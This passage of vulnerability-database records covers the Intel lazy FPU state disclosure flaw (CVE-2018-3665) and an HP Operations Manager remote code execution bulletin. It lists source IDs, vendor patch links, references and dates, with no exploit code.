        "db": "LENOVO",
        "id": "LEN-22880",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1899.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1724",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1899",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "148468",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "148257",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "148641",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "148246",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "148195",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148264",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148486",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "152883",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "db": "BID",
        "id": "104460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "PACKETSTORM",
        "id": "152897"
      },
      {
        "db": "PACKETSTORM",
        "id": "148468"
      },
      {
        "db": "PACKETSTORM",
        "id": "148486"
      },
      {
        "db": "PACKETSTORM",
        "id": "148641"
      },
      {
        "db": "PACKETSTORM",
        "id": "148246"
      },
      {
        "db": "PACKETSTORM",
        "id": "152883"
      },
      {
        "db": "PACKETSTORM",
        "id": "148257"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "id": "VAR-201806-1505",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      }
    ],
    "trust": 0.06999999999999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      }
    ]
  },
  "last_update_date": "2024-07-23T20:32:57.575000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "INTEL-SA-00145",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html"
      },
      {
        "title": "IntelCoreMicroprocessors Information Disclosure Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/134565"
      },
      {
        "title": "Intel Core-based microprocessors Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81028"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2018/07/14/security_roundup_july_13/"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2018/06/26/oracle_patches_lazy_fpu_and_spectre/"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2018/06/13/intel_lazy_fpu_state_security_flaw/"
      },
      {
        "title": "Red Hat: Moderate: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181944 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181852 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: kernel-rt security, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182165 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-4232-1 xen -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=914847e5cb561e20d948d17c664315c1"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182164 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2018-3665",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2018-3665"
      },
      {
        "title": "Citrix Security Bulletins: Citrix XenServer Security Update for CVE-2018-3665",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=1ca97a0fe91c034cdbea38610fed06d7"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191170 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191190 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3698-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3696-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3696-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3698-1"
      },
      {
        "title": "Palo Alto Networks Security Advisory: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=590e851f11b8d638e5894fbe54b4a3cb"
      },
      {
        "title": "Apple: macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=6271728c896ad06d4d117e77589eea2f"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=204a1aa9ebf7b5f47151e8b011269862"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=ae57a14ec914f60b7203332a77613077"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=07ab17c2d7ba0de54dd1d1406e963124"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - April 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=c0bb087d513b6ab7ce4efb0405158613"
      },
      {
        "title": "Fortinet Security Advisories: Meltdown and Spectre class vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=fortinet_security_advisories\u0026qid=fg-ir-18-002"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=05b5bbd6fb289370b459faf1f4e3919d"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM API Connect has addressed multiple vulnerabilities in Developer Portal\u2019s dependencies \u2013 Cumulative list from June 28, 2018 to December 13, 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=43da2cd72c1e378d8d94ecec029fcc61"
      },
      {
        "title": "TEApot",
        "trust": 0.1,
        "url": "https://github.com/github-3rr0r/teapot "
      },
      {
        "title": "TEApot",
        "trust": 0.1,
        "url": "https://github.com/mashiro1995/teapot "
      },
      {
        "title": "rhel-centos-ec2-vuls",
        "trust": 0.1,
        "url": "https://github.com/riboseinc/rhel-centos-ec2-vuls "
      },
      {
        "title": "Hardware-and-Firmware-Security-Guidance",
        "trust": 0.1,
        "url": "https://github.com/nsacyber/hardware-and-firmware-security-guidance "
      },
      {
        "title": "Firmware-Security",
        "trust": 0.1,
        "url": "https://github.com/virusbeee/firmware-security "
      },
      {
        "title": "hardware-attacks-state-of-the-art",
        "trust": 0.1,
        "url": "https://github.com/codexlynx/hardware-attacks-state-of-the-art "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/104460"
      },
      {
        "trust": 2.1,
        "url": "https://support.citrix.com/article/ctx235745"
      },
      {
        "trust": 2.1,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html"
      },
      {
        "trust": 2.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1852"
      },
      {
        "trust": 2.0,
        "url": "https://access.redhat.com/errata/rhsa-2018:1944"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:2164"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1170"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1190"
      },
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/3698-2/"
      },
      {
        "trust": 1.8,
        "url": "https://help.ecostruxureit.com/display/public/uadce725/security+fixes+in+struxureware+data+center+expert+v7.6.0"
      },
      {
        "trust": 1.8,
        "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/4787"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20181016-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://security.paloaltonetworks.com/cve-2018-3665"
      },
      {
        "trust": 1.8,
        "url": "https://www.synology.com/support/security/synology_sa_18_31"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2018/dsa-4232"
      },
      {
        "trust": 1.8,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-18:07.lazyfpu.asc"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2165"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1041124"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1041125"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3696-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3696-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3698-1/"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3665"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-3665"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2018-3665"
      },
      {
        "trust": 0.6,
        "url": "https://securitytracker.com/id/1041124"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1174"
      },
      {
        "trust": 0.6,
        "url": "https://fortiguard.com/psirt/fg-ir-18-002"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-22880"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.1899.2/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/152897/red-hat-security-advisory-2019-1190-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/80978"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.1899/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "http://www.intel.com/content/www/us/en/homepage.html"
      },
      {
        "trust": 0.3,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=58122bf1d856a4ea9581d62a07c557d997d46a19"
      },
      {
        "trust": 0.3,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180016"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1585011"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jun/55"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/oss-sec/2018/q2/189"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16939"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11091"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13215"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-11600"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7913"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-18559"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12126"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-7913"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-17558"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-12126"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12127"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-13215"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-12190"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11091"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-8633"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-12130"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18559"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17558"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11600"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8633"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/vulnerabilities/mds"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-12127"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1068"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-16939"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12130"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12190"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4248"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4269"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4178"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4285"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4289"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4293"
      },
      {
        "trust": 0.2,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4268"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4277"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4283"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4280"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/./dsa-4232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/github-3rr0r/teapot"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=58196"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10675"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-3639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10872"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10675"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10872"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5383"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/solutions/3485131"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000407"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000407"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/xen"
      },
      {
        "trust": 0.1,
        "url": "https://xenbits.xen.org/xsa/advisory-267.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "db": "BID",
        "id": "104460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "PACKETSTORM",
        "id": "152897"
      },
      {
        "db": "PACKETSTORM",
        "id": "148468"
      },
      {
        "db": "PACKETSTORM",
        "id": "148486"
      },
      {
        "db": "PACKETSTORM",
        "id": "148641"
      },
      {
        "db": "PACKETSTORM",
        "id": "148246"
      },
      {
        "db": "PACKETSTORM",
        "id": "152883"
      },
      {
        "db": "PACKETSTORM",
        "id": "148257"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "db": "BID",
        "id": "104460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "PACKETSTORM",
        "id": "152897"
      },
      {
        "db": "PACKETSTORM",
        "id": "148468"
      },
      {
        "db": "PACKETSTORM",
        "id": "148486"
      },
      {
        "db": "PACKETSTORM",
        "id": "148641"
      },
      {
        "db": "PACKETSTORM",
        "id": "148246"
      },
      {
        "db": "PACKETSTORM",
        "id": "152883"
      },
      {
        "db": "PACKETSTORM",
        "id": "148257"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-07-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "date": "2018-06-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "date": "2018-06-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "date": "2018-06-13T00:00:00",
        "db": "BID",
        "id": "104460"
      },
      {
        "date": "2018-07-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "date": "2019-05-15T15:21:46",
        "db": "PACKETSTORM",
        "id": "152897"
      },
      {
        "date": "2018-07-09T20:20:22",
        "db": "PACKETSTORM",
        "id": "148468"
      },
      {
        "date": "2018-07-11T02:45:46",
        "db": "PACKETSTORM",
        "id": "148486"
      },
      {
        "date": "2018-07-23T13:01:11",
        "db": "PACKETSTORM",
        "id": "148641"
      },
      {
        "date": "2018-06-19T20:32:22",
        "db": "PACKETSTORM",
        "id": "148246"
      },
      {
        "date": "2019-05-15T15:06:32",
        "db": "PACKETSTORM",
        "id": "152883"
      },
      {
        "date": "2018-06-20T20:11:00",
        "db": "PACKETSTORM",
        "id": "148257"
      },
      {
        "date": "2018-06-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "date": "2018-06-21T20:29:00.373000",
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-07-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "date": "2020-07-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "date": "2021-06-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "date": "2018-07-17T12:00:00",
        "db": "BID",
        "id": "104460"
      },
      {
        "date": "2018-07-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "date": "2020-07-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "date": "2021-06-09T16:24:06.037000",
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "104460"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Intel Core Information disclosure vulnerability in systems with microprocessors",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      }
    ],
    "trust": 0.6
  }
}

var-201410-1302
Vulnerability from variot

Unspecified vulnerability in HP Operations Manager 9.20 on UNIX allows remote attackers to execute arbitrary code via unknown vectors. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Few technical details are currently available. We will update this BID as more information emerges. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04472866

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04472866 Version: 1

HPSBMU03127 rev.1 - HP Operations Manager for UNIX, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

References: CVE-2014-2648, CVE-2014-2649 (SSRT101727)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates can be downloaded from HP Software Support Online (SSO).

9.11.120 server patches: Component Download Location

OMHPUX_00004 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188205

ITOSOL_00802 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187924

OML_00080 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187666

9.11.120 Java UI patches: Component Download Location

OMHPUX_00005 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187192

ITOSOL_00803 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187435

OML_00081 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188103

9.20.300 server patches: Component Download Location

OMHPUX_00006 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188207

ITOSOL_00804 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188065

OML_00082 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188209

HISTORY Version:1 (rev.1) - 8 October 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

